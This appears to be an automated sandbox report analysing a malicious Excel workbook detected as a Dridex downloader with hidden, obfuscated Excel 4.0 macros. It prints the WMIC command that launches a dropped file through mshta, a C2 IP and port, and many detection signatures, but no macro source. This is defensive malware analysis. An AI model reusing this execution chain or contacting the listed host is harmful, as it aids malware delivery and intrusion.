Loading ...

Play interactive tourEdit tour

Windows Analysis Report promo code83874071.xlsb

Overview

General Information

Sample Name:promo code83874071.xlsb
Analysis ID:528041
MD5:b6c09b88eeb411e648f688e7ca6a1ca9
SHA1:da6a58fbb01118bf77842f75cb217c3cf33ded2f
SHA256:cb53bf4394e7f77534ca8bfa1039fc76c50a54be4dce411926dbb594a1a55c52
Tags:xlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6336 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 3876 cmdline: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5380 cmdline: mshta C:\ProgramData\MqscKrfE.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\MqscKrfE.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6336, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", ProcessId: 3876
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6336, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", ProcessId: 3876

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: promo code83874071.xlsbVirustotal: Detection: 10%Perma Link
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.3:49777 -> 136.144.181.174:8080
      Source: global trafficTCP traffic: 192.168.2.3:49777 -> 136.144.181.174:8080
      Source: Joe Sandbox ViewIP Address: 136.144.181.174 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.aadrm.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.cortana.ai
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.office.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.onedrive.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://augloop.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cdn.entity.
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cortana.ai
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cortana.ai/api
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://cr.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://directory.services.
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://graph.windows.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://graph.windows.net/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://login.windows.local
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://management.azure.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://management.azure.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://messaging.office.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://ncus.contentsync.
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://officeapps.live.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://onedrive.live.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://osi.office.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://outlook.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://outlook.office.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://outlook.office365.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://roaming.edog.
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://settings.outlook.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://tasks.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://wus2.contentsync.
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 83AB67A7-816A-439D-B972-9539D466DB6C.0.drString found in binary or memory: https://www.odwebp.svc.ms

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\MqscKrfE.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: promo code83874071.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: promo code83874071.xlsbInitial sample: Sheet name: Macro1
